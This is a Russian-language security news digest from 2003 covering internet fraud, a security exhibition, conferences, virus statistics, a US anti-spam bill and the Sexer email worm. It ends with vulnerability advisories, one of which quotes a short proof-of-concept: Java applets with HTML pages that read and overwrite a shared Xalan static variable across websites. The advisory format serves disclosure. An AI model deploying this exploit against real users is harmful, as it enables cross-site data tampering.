Борьба с преступлениями, совершенными в России с помощью интернета, будет усилена. По словам начальника Федеральной службы по борьбе с экономическими и налоговыми преступлениями (ФСЭНП) МВД РФ Сергея Веревкина-Рахальского, сетевых мошенников становится всё больше. "На сегодняшний день озабоченность органов внутренних дел вызывает использование мошенниками Интернета для выстраивания финансовых пирамид", - цитирует его слова РИА "Новости".

По его словам, речь идет о том, что подставные компании через Интернет набирают штат участников - держателей пластиковых кредитных карт, на которые необходимо внести первоначальный взнос. Затем на эти карты виртуально начисляются "значительные денежные средства", которые используются для совершения покупок не существующего товара в интернет-магазине. После этого мошенники производят отмену всех операций возврата, а денежные средства с платежных карт снимаются и компания-организатор исчезает.

Замминистра сообщил, что по фактам мошенничества, совершенного финансовыми пирамидами, ФСЭНП направила в суды 12 уголовных дел. Еще по восьми делам проводятся следственные действия. "Наиболее активно в этом направлении работают подразделения ГУВД-УВД Волгоградской, Новосибирской, Омской, Оренбургской, Самарской, Саратовской областей, Санкт-Петербурга и Ленинградской области," - сообщил Веревкин-Рахальский.

Организаторами конференции являются МЭРТ РФ, Минсвязи России, Государственный университет – Высшая школа экономики, ИД "Компьютера" и фонд "Новая экономика". Цели конференции – это выработка стратегии внедрения информационных технологий среди CIO федеральных и региональных органов власти; обсуждение проблем, связанных с внедрением информационных технологий в министерствах и ведомствах РФ. С докладами выступят первый заместитель министра экономического развития и торговли РФ А. Шаронов, первый заместитель министра РФ по связи и информатизации А. Коротков, ректор Государственного университета – Высшей школы экономики Я. Кузьминов.

Международная выставка “Security & Safety Middle East-2003” – первая выставка по безопасности в странах Персидского залива и Ближнего Востока. Выставка состоялась 5-8 октября 2003 года в Абу Даби (Объединенные Арабские Эмираты). Среди 9 национальных павильонов был и коллективный стенд России.

Организаторы “Security & Safety Middle East-2003” - государственная выставочная компанией General Exhibition Corporation совместно с Messe Essen (Германия) при поддержке Министерства внутренних дел ОАЭ. Выставку открыл генерал-майор шейх Саиф бен Зайед Аль Нахьян. В церемонии открытия приняли участие также руководство МВД и гражданской обороны ОАЭ. Выставку посетили 18 официальных делегаций профильных министерств и ведомств иностранных государств.

В “Security & Safety Middle East-2003” приняли участие 179 компании из 24 стран, разместившиеся на площади нетто 4 218 кв.м., На выставке были представлены экспозиции Австрии, Бельгии, Канады, Кипра, Чехословакии, Финляндии, Франции, Германии, Гонконга, Индии, Италии, Кореи, Кувейта, Норвегии, России, Саудовской Аравии, Южной Африки, Швейцарии, Тайваня, Турции, ОАЭ, Великобритании, Украины, США.

Организаторы российской экспозиции - Международный форум "Технологии безопасности" и "Рособоронэкспорт" представили лучшие образцы продукции российских производителей для потребителей мирового рынка систем безопасности.

Экспозиция России представляла собой объединенный стенд 7 компаний, на общей площади 54 кв.м., reception российской делегации и бизнес центр. В состав российской делегации вошли 18 человек, среди них – представители ФГУП "Рособоронэкспорт", Национальной ассоциации телохранителей России, компаний "Рубеж" (Саратов), "Бастион" (Ростов-на-Дону), "Транскрипт" (Москва) и др.

Российская экспозиция вошла в Официальный маршрут обхода выставки, в том числе в числе почетных гостей стенд дважды посетил Шейх Саиф Бин Зайед Аль Нахьян, Первый секретарь Министерства внутренних дел ОАЭ. Среди гостей стенда можно отметить председателя Торгово-промышленных палат ОАЭ, начальника королевской охраны ОАЭ, посла Украины в ОАЭ и пр.

Об интересе со стороны посетителей к российским технологиям безопасности, представленным на экспозиции, говорят цифры и факты. Компания "Рубеж" заключила контракт с одной их крупных строительных фирм в Абу Даби, руководитель фирмы заявил о возможном рассмотрении вопроса сертификации товара фирмы в ОАЭ. Широко известная в арабском регионе продукция фирмы "Транскрипт" - круглосуточные и повсеместные детекторы оптических устройств - традиционно привлекла внимание военных и представителей правоохранительных органов арабских государств. Успешным дебютом отметила первый день выставки и московская фирма "MICROLIGHT" - было заключено три намерения о деловом сотрудничестве с фирмами из ОАЭ и Саудовской Аравии.

Экспозицию России посетили специалисты из 26 стран, причем только на стенде компании "Рубеж", например, согласно данным по учету посетителей, проходимость за день составляла 150 деловых посетителей. Профиль посетителей продемонстрировал их широкую географию и уровень принятия решений (крупные байеры, строительные организации, высокопоставленные чиновники министерств, пр.)

Одним из главных мероприятий выставки стала конференция, организованная МВД ОАЭ, с участием экспертов из разных стран мира. Ее главные темы: современные тенденции в безопасности, проблемы безопасности в обществе со свободной экономикой, международная обстановка и ее влияние на безопасность личности и государств.

Активное участие в деловой программе приняли и представители России. На конференции прозвучал доклад члена российской делегации Президента НАСТ России Дмитрия Фонарева "Российский опыт в борьбе с организованной преступностью", который стал центральным событием дня для посетителей деловой программы и арабских специалистов в области обеспечения безопасности. Доклад был отмечен специальной наградой от имени Министра Внутренних Дел ОАЭ - большой хрустальной медалью Форума "Security and Safety Middle East 2003"

Кроме того, российская делегация провела брифинг для прессы, который посетили журналисты 10 СМИ, в т.ч. представители "Аль-Ахбар", "Шарк", "Аль-Баян", "Security International", пр.

Иоахим Ханнеке, директор Messe Essen (Германия), соорганизатор выставки “Security & Safety Middle East-2003”, и Директор компании "Защита ЭКСПО" Игорь Филоненко, организатор Форума "Технологии безопасности", провели очередные переговоры и наметили перспективы дальнейшего сотрудничества. Среди ближайших планов – Официальный визит и организация коллективной экспозиции Германии на Форуме "Технологии безопасности" в феврале 2004 года, а также активизация международной программы Форума, предполагающая организацию коллективных экспозиций России на крупнейших мировых выставках по безопасности.

VideoHub - сетевой видеосервер, интегрированный в программно-аппаратный комплекс "Инспектор +". Назначение: оцифровка, сжатие и передача видеоинформации по телекоммуникационным каналам. Мощное программное

обеспечение "Инспектор+" позволяет осуществлять удаленное управление системой и любым охранным оборудованием. Благодаря высокой производительности и повышенной аппаратной надежности VideoHub рекомендован ведущими российскими специалистами для использования на крупномасштабных инсталляциях и систем видеонаблюдения городского масштаба.

На российский рынок выходит сетевой видеосервер, основная особенность которого - полнофункциональное программное обеспечение, позволяющее использовать все возможности hi-tech security для построения распределенных систем безопасности и удаленного видеоконтроля. VideoHub применим для условий, требующих повышенной надежности оборудования.

Это компактное устройство не требует специального обслуживания, и не зависит от операционной системы и недостатков винчестера. VideoHub более стабилен,

чем обычный видеосервер.

Компания "Интеллектуальные системы безопасности" выпустила VideoHub в двух вариантах.

Linux VideoHub на основе ОС Linux, с возможностью подключения до 8 аналоговых видеокамер. За счет применения флэш-памяти вместо механического жесткого диска, а также системы аппаратной диагностики обеспечивается повышенная аппаратная надежность.

VideoHub non-PC-based на основе специализированного image-процессора. Просмотр и обработка изображения осуществляется на любом удаленном

компьютере с помощью программного обеспечения Инспектор+. Доступны все преимущества комплекса Инспектор+, объединяющего в себе систему видеонаблюдения, охранно-пожарную сигнализацию, модуль управления контролем

доступа и другое специализированное оборудование.

Компания "Информзащита" получила медаль и диплом 5-й Всероссийской конференции "Информационная безопасность России в условиях глобального информационного общества" ("Инфофорум"), прошедшей в Москве 20 октября. Этих наград компания удостоилась за решение по обеспечению защиты информации операторов мобильной связи. Диплом присужден в номинации "Проект года в области обеспечения информационной безопасности мобильной связи".

Сотрудник компании Андрей Степаненко выступил на конференции с докладом на тему "Возврат инвестиций в информационную безопасность – миф или реальность". В своем выступлении он рассмотрел два различных подхода к оценке эффективности затрат на обеспечение информационной безопасности и сравнил их применимость в современных условиях.

Компания "Информзащита" – традиционный участник Всероссийской конференции "Информационная безопасность России в условиях глобального информационного общества". В компании считают это мероприятие очень полезным для общения российских специалистов и крайне важным для развития отечественного рынка информационной безопасности.

В 2003 году в Китае доля компьютеров, подвергшихся атаке разных компьютерных вирусов, составила 85,57%, что, соответственно, на 1,59% и 25,57% выше уровня 2002 и 2001 года. 63,57% пользователей компьютеров пострадали из-за электронных вирусов. Такую информацию распространило на этой неделе Министерство общественной безопасности КНР.

К другим новостям из Китая: 23 октября в Пекине открылась первая Китайская международная ярмарка интернет-культуры, на которой почти 100 китайских и зарубежных предприятий из области интернет-индустрии обсудят вопросы освоения китайского интернет-рынка. Организаторами ярмарки, которая продлится до 26 октября, являются Министерство культуры, Госсовет КНР и Пекинское городское правительство. В ходе ярмарки также будет проведен Форум по вопросам развития рынка интернетовской культуры, в котором примут участие представители предприятий, вузов и исследовательских кругов. Главная тема ярмарки - "Развитие интернета и информатики". Организаторы ярмарки надеются на содействие обменам и сотрудничеству Китая с зарубежными странами в области информатики путем проведения ярмарки.

Согласно статистике, в настоящее время в Китае интернетом пользуются 68 млн человек. За первые 6 месяцев текущего года общее число пользователей Сети в стране увеличилось на 8,9 млн. абонентов. Нынешнее число пользователей интернета в 109,7 раза больше показателя 1997 года.

"Лаборатория Касперского" предупреждает о распространении новой, уже третьей по счету версии червя Sexer - Sexer.c, также рассылаемой якобы от имени технической поддержки Лаборатории Касперского.

Новый червь практически полностью идентичен варианту b. Отличается от него только меньшим размером - 97К, достигнутым за счет того, что вложенная в вирус картинка, которая устанавливается в качестве фона рабочего стола Windows, уменьшена с 230К до 13К.Текст в данной картинке полностью совпадает с текстом из варианта b.

Все обнаруженные версии вредоносной программы были успешно обезврежены. Процедуры защиты от всех версий данного сетевого червя своевременно добавлены в базу данных Антивируса Касперского.

"Лаборатория Касперского" настоятельно рекомендует пользователям внимательно следить за вирусными предупреждениями, ежедневно обновлять антивирусные базы своего антивируса и не поддаваться уловкам социального инжиниринга, используемым вирусописателями.

Более подробное описание первой и второй версий интернет-червя Sexer доступно в Вирусной Энциклопедии Касперского.

25-26 ноября 2003 г., Россия, г. Москва

Главная тема 2003 года: "Проблемы интеллектуальной собственности в киберпространстве"

Конференция проводится под эгидой Программы ЮНЕСКО "Информация для всех"

Развитие Интернета ставит перед юристами целый ряд проблем, требующих концептуального решения. Цель Конференции - объединить усилия ученых и практикующих юристов, специалистов в области информационных технологий для решения вопросов, связанных с особенностями правового регулирования и правореализации в условиях Интернета.

Конференция 2003 года организуется как форум, на котором ведущие российские и зарубежные специалисты рассмотрят узловые вопросы формирования глобального информационного общества, в первую очередь вопросы ИКТ в юридическом образовании, проблемы интеллектуальной собственности в контексте всеобщего доступа к киберпространству и подходы к информационной безопасности в цифровую эпоху

Участникам Конференции будет предоставлена возможность профессионального и творческого общения с коллегами из различных регионов России, стран ближнего и дальнего зарубежья.

Предлагаются следующие проблемно-тематические направления работы Конференции:

-авторское право и Интернет: проблемы интеллектуальной собственности в киберпространстве;
-правовые аспекты информационной безопасности;
-электронный документооборот в гражданско-правовых, уголовно-правовых, публично-правовых отношениях.

Планируется проведение круглых столов:

-Информационное право как учебный курс. Использование кибертехнологий в юридическом образовании.
-Круглый стол доноров (грантодателей), поддерживающих проекты в области коммуникаций и информации.

В период проведения конференции будет работать выставка проблемно-ориентированных информационных продуктов и услуг, книжно-журнальной и другой издательской продукции.

Окончательная программа конференции будет составлена с учетом заявленных выступлений.

Организационный комитет Конференции приглашает российских и зарубежных специалистов принять участие в работе V Международной конференции "Право и Интернет: теория и практика". Приглашаются специалисты в области права, образования, науки, культуры и коммуникаций, познания которых важны при разработке и реализации национальной, региональной и международной политики по формированию глобального информационного общества и общества знаний. К участию в конференции приглашаются также писатели, издатели, журналисты и другие заинтересованные лица.

7

В Сенате США абсолютным большинством голосов был в среду одобрен федеральный законопроект, определяющий на государственном уровне правила рассылки по электронной почте так называемого спама - незапрошенных получателями коммерческих предложений.

Как сообщает агентство Reuters, законопроект не предусматривает полного запрета на спам, однако вводит жесткие ограничения на методы его рассылки и разновидности рекламируемых товаров и услуг. Так, напрямую запрещается рассылать письма, вводящие получателей в заблуждение, рекламирующие противозаконные услуги и запрещенные медицинские препараты. По оценкам экспертов, подобные письма составляют до двух третей всего спама.

Всего объемы спама, по экспертным подсчетам, составляют в США более половины всего почтового трафика, что серьезно затрудняет как работу интернет-провайдеров, так и простых пользователей электронной почты.

Законопроект запрещает применение многих стандартных спамерских технологий: фальсификации обратного адреса, маскировки поля "Тема", автоматического перебора комбинаций букв с целью выявления действующих адресов, различных способов обхода антиспамерских фильтров.

Предусматривается, что нарушители закона будут караться тюремным заключением на срок до одного года и штрафами на сумму до миллиона долларов. Злостные спамеры будут садиться в тюрьму на пять лет. Вместе с тем, частные лица не смогут подавать иски против спамеров: это будет разрешено лишь правоохранительным структурам и интернет-провайдерам.

Вместе с тем, напрямую не запрещаются коммерческие предложения, не нарушающие оговоренные запреты. В том числе разрешаются коммерческие предложения, содержащие информацию сексуального характера, однако такие сообщения должны быть особо отмечены, чтобы пользователи могли отфильтровать их.

Законопроект предусматривает создание в США так называемого "do-not-spam"-списка - федерального списка электронных адресов, владельцы которых вообще не хотели бы получать спам. Как известно, недавно в США был организован сбор желающих не получать коммерческие предложения по телефону - номера этих абонентов были включены в так называемый "do-not-call"-список.

Согласно законопроекту, владельцам адресов, которые будут включены в "do-not-spam"-список, запрещается слать спам в любом случае, на другие адреса можно присылать коммерческие предложения, пока пользователь сам не заявит отправителю спама о нежелании больше получать от него корреспонденцию.

Как известно, многие штаты США уже ввели свои законы против спама. Новый федеральный законопроект, который теперь должен быть утвержден администрацией президента США (ее представители уже заявили, что поддерживают инициативу), имеет приоритетное действие над местными законами, однако власти штатов вправе устанавливать более жесткие наказания за оговоренные в нем правонарушения.
8

Сетевой червь Sexer, неделю назад распространявший по интернету рекламу одного из кандидатов в мэры Москвы, возродился в новом качестве. Его новая версия тоже занимается агитацией, но лозунг теперь совсем другой. Попутно вредоносная программа пытается очернить антивирусную компанию "Лаборатория Касперского".

Червь рассылает себя, маскируясь под сообщение технической службы "Лаборатории Касперского". Текст письма написан от имени "Лаборатории": "В связи с появлением в Сети нового почтового червя I-Worm.Sexer предлагаем Вам утилиту для выявления и удаления этого червя из системы". В письмо вложен исполняемый файл, но это, конечно, никакая не антивирусная программа, а самый настоящий вирус. Если открыть его, компьютер будет заражен. В "Лаборатории Касперского" уже зафиксировали несколько обращений от российских пользователей.

"В соответствии со стандартами информационной безопасности, техническая служба "Лаборатории Касперского" никогда не рассылает исполняемые файлы, и наши пользователи прекрасно об этом осведомлены", - говорит Светлана Новикова, менеджер "Лаборатории Касперского" по корпоративным коммуникациям и PR. По её словам, фальсификация адреса отправителя и маскировка письма под сообщение службы технической поддержки антивирусной компании - довольно распространенный метод, особенно среди начинающих вирусописателей.

Деятельность червя после запуска начинается с установки в качестве фона рабочего стола Windows картинки с текстом "АБОРТ - узаконенное убийство". Для запуска процедуры размножения вирус копирует себя в директорию Program Files\Common Files\System и регистрируется в ключе автозапуска системного реестра. Затем червь рассылает себя по всем адресам электронной почты из адресной книги Windows, напрямую подключаясь к SMTP-серверу.

"Использование вирусописателем технически примитивных средств, а также общая компьютерная грамотность большинства современных пользователей, делают шансы на распространение данной вредоносной программы невысокими", - считает Светлана Новикова.

Программа: Sun Java SDK 1.4.2_01 JDK 1.x, Sun Java JRE 1.4.x Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Sun Java. Злонамеренный неподписанный апплет может манипулировать некоторыми статическими переменными. Некоторые недокументированные статические переменных доступны из общедоступной памяти различными апплетами в одно и тоже время. Уязвимость обнаружена в "org.apache.xalan.processor.XSLProcessorVersion" классе. Уязвимость может эксплуатироваться злонамеренным Web сайтом, чтобы изменить или просматривать данные из другого Web сайта. Для успешной эксплуатации, требуется одновременное посещение пользователем обеих сайтов. Пример/Эксплоит: /* Illegalaccess.org java exploit */ /* coded by Marc Schoenefeld */ import java.awt.Graphics; public class ReadApplet extends java.applet.Applet { public void paint(Graphics g) { System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION); } static { System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION); } ==========READAPPLET========================= ==========WRITEAPPLET========================= import java.awt.Graphics; public class WriteApplet extends java.applet.Applet { public void paint(Graphics g) { org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a"; } static { org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered from SiteA"; } ==========WRITEAPPLET========================= =========Write.html============================ <HTML> <BODY BGCOLOR=#66FF66> WriteApplet, write to variable Marc (marc@org.illegalaccess) <applet codebase=. code=WriteApplet.class width=100 height=100> </applet> </BODY> </HTML> ========Read.html============================= <HTML> <BODY BGCOLOR=#6666FF> ReadApplet, read from variable Marc (marc@org.illegalaccess) <applet codebase=. code=ReadApplet.class width=100 height=100> </applet> </BODY> </HTML> URL производителя:http://www.sun.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Cross Site Java applets

Программа: HP Servicecontrol Manager 3.0 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в HP Serviccontrol Manager. Локальный пользователь может получить доступ к приложению. Сообщается, что локальный пользователь может получить доступ к GUI Servicecontrol Manager через Web браузер. Дополнительные подробности не раскрываются. URL производителя:http://www.hp.com/ Решение: HP выпустил обновленную версию B.03.00.04, которую можно установить через утилиту swinstall(1), доступную на http://software.hp.com.

Другие публикации: HPSBUX0310-292 : HEWLETT-PACKARD обновил SCM3.0

Программа: MERCUR Mail Server 4.2 Опасность: Средняя Наличие эксплоита: Нет Описание: Переполнение буфера обнаружено в MERCUR mail server. Удаленный пользователь может аварийно завершить работу почтового сервера. Удаленный пользователь может послать команду AUTH с чрезмерно длинными данными к SMTP, POP3, или IMAP4 службе, чтобы аварийно завершить работу целевой службы. URL производителя:http://www.atrium-software.com Решение:Установите обновленную версию программы (4.2 Service Pack 3a): http://www.atrium-software.com/mail%20server/pub/mcr42sp3a.html

Atrium Software released MERCUR Mailserver Version 4.2 - Service Pack 3a